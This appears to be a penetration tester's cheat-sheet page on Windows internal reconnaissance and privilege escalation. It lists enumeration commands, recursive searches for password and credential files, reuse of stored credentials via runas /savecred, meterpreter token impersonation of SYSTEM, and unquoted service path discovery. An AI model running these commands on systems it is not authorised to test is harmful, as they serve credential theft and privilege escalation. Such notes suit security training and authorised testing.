Internal Recon

Search…

Internal Recon

General
System info
1
systeminfo
2
hostname
3
whoami /all
Copied!
Users/localgroups on the machine
1
net users
2
net localgroups
3
net localgroups Administrators
4
net user hax0r
5
​
6
#Check local and domain
7
net user hax0r /domain
8
net group Administrators /domain
Copied!
Network information/connections
1
ipconfig /all
2
route print
3
arp -A
4
netstat -ano
Copied!
Search tips
1
#FindStr
2
findstr /spin "password" *.* //Recursive string scan
3
​
4
#Dir
5
dir /a-r-d /s /b //Search for writeable directories
6
dir secret.txt /s /p //Search for secret.txt recursive from folder
7
dir /s *pass* == *cred* == *vnc* == *.config* //Search for certain words
Copied!
Privilege Escalation
Stored Credential
1
cmdkey /list //Check if any stored key
2
runas /user:administrator /savecred "cmd.exe /k whoami" //Using them
Copied!
Impersonating Tokens with meterpreter
1
use incognito
2
list_tokens -u
3
impersonate_token NT-AUTHORITY\System
Copied!
Unquoted Path
1
#Obtain the path of the executable called by a Windows service
2
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul
3
​
4
#Default search
5
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v
Copied!

SO - Previous

Windows

External Recon

Last modified 8mo ago

Copy link

Contents

General

System info

Users/localgroups on the machine

Network information/connections

Search tips

Privilege Escalation

Stored Credential

Impersonating Tokens with meterpreter

Unquoted Path